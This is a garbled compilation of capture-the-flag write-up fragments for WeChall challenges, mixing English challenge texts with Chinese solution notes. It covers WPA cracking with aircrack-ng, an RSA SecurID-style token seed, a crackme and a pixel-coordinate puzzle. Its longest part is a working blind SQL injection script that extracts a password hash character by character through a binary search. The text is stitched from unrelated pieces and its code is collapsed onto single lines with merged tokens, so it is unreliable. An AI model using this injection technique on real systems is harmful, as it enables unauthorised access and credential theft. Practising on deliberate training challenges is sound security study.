You woke up for another gray day, and noticed that your bank account
is empty as it is for months. You need some quick easy money, so you
join some "darknet" irc channels in order to speak with people, who are
able to give you some "not fully legal" job. Your new boss wants you to
hack into a small bank infrastructure, and transfer money from one
account to another. Easy job, huh?
You drive with your van to the bank's main office, and setup your
favourite wireless sniffing tool. Wow, it looks like they are using some
WPA network. Let's sniff some data, and try to crack the WPA password
with some dictionary attack.
Bug report: some older versions of aircrack-ng are unable to crack
the password, be sure to use the latest (rc1 is known to be
working).
Good job. Now you have successfully uploaded the new token data for the victims bank account. The base filename is the serial number for the token, and the seed (secret) is d4e3f9eb36c9ebf3. Please note it is an older format of PSA InsecurID, the newer ones are using digitally signed XML files and longer seeds. After you have uploaded the new token data, you have to generate a valid one time password for that token for 27. of July, 2012 14:24 GMT+1
Part 3: RSA SecurID v1 OTP
计算
这是整个挑战最难的部分。需要根据 seed 和指定时间计算 RSA SecurID
一次性密码。
"PSA InsecurID" 是什么
论坛帖子(Z 本人)提示:"PSA InSecurID is really, really clear. Just
change/remove a few letters and it's obvious."
A paranoid friend has sent me a message, but in his paranoid mind he
forgot to tell me how to decode it. If Picasso got a computer he would
know what to do!
每个坐标对格式是 NNxNN,其中 x 范围 10-43,y 范围
10-16。字母(a, d, l,
y...)只是点分隔符,可以全部丢弃。
Step 2: 画图
用任意方式把坐标画成像素:
Python:
1 2 3 4 5 6
grid = {} for x_str, y_str in coords: grid[(int(x_str), int(y_str))] = '#'
for y inrange(10, 17): print(''.join(grid.get((x, y), ' ') for x inrange(10, 44)))
ImageJ(论坛方案):
1 2 3 4 5 6
newImage("Vermeer", "8-bit white", 100, 100, 1); for (i = 1; i < lengthOf(message) - 5; i += 6) { x = parseInt(substring(message, i, i + 2)); y = parseInt(substring(message, i + 3, i + 5)); setPixel(x, y, 0); }
This time we will dive into a small windows application to get you
started with cracking. We are using x64debug and analyze the crackit
"Amaze Me" from bb on TBS.
# 转二维网格:0=路, 1=墙 grid = [] for row inrange(NUM_ROWS): r = [] for col inrange(ROW_WIDTH): b = maze_bytes[row * ROW_WIDTH + col] r.append(1if b != 0else0) grid.append(r)
The christmas sales are going up, and we have won a special customer. Our new client wants an httpd, but with a custom http method. Basically you have to implement the "BUNNY" method which has to result in a "HTTP/1.1 202 BunnyAccepted" response.
# 从 RGB 值中提取 Morse 符号 symbols1 = [] for p in pixels: symbols1.append(chr(p[0])) # R → dot(46) or dash(45) symbols1.append(chr(p[1])) # G symbols1.append(chr(p[2])) # B morse1 = ''.join(symbols1)
if'correct'in r.text.lower() or'solved'in r.text.lower(): print("[+] SOLVED!") elif'gwf_messages'in r.text: msgs = re.findall(r'<li>(.*?)</li>', r.text) for m in msgs: if m.strip(): print(f" MSG: {m}") elif'gwf_errors'in r.text: errs = re.findall(r'<li>(.*?)</li>', r.text) for e in errs: if e.strip(): print(f" ERR: {e}")
if'more'in r.text.lower() or'consecutive'in r.text.lower(): print("[i] Need more consecutive rounds — running again...") success_count = 1 while success_count < 5: s.get(URL, params={'reset': 'me'}) time.sleep(0.5) recovered2 = '' for pos inrange(1, 33): lo2, hi2 = 0, len(ALPHABET) - 1 while lo2 < hi2: mid2 = (lo2 + hi2) // 2 mid_char2 = ALPHABET[mid2] payload2 = f"' OR IF(SUBSTR(password,{pos},1)>'{mid_char2}', 1, (SELECT 1 UNION SELECT 2)) -- " if has_error(payload2): hi2 = mid2 else: lo2 = mid2 + 1 time.sleep(0.1) recovered2 += ALPHABET[lo2] sys.stdout.write(f'\r Round {success_count+1}: [{pos}/32] {recovered2}') sys.stdout.flush() r2 = s.post(URL, data={'thehash': recovered2, 'mybutton': 'Enter'}) if'solved'in r2.text.lower() or'congrat'in r2.text.lower(): print(f"\n[+] SOLVED after {success_count+1} rounds!") recovered = recovered2 break elif'correct'in r2.text.lower() or'more'in r2.text.lower(): success_count += 1 print(f"\n[i] Round {success_count} passed, need more...") else: print(f"\n[!] Round {success_count+1} failed") msgs = re.findall(r'<li>(.*?)</li>', r2.text) for m in msgs: if m.strip(): print(f" {m}") break
print(f"\n[*] Final hash: {recovered}") print("[*] Check https://www.wechall.net/en/challs for wc_chall_solved_1")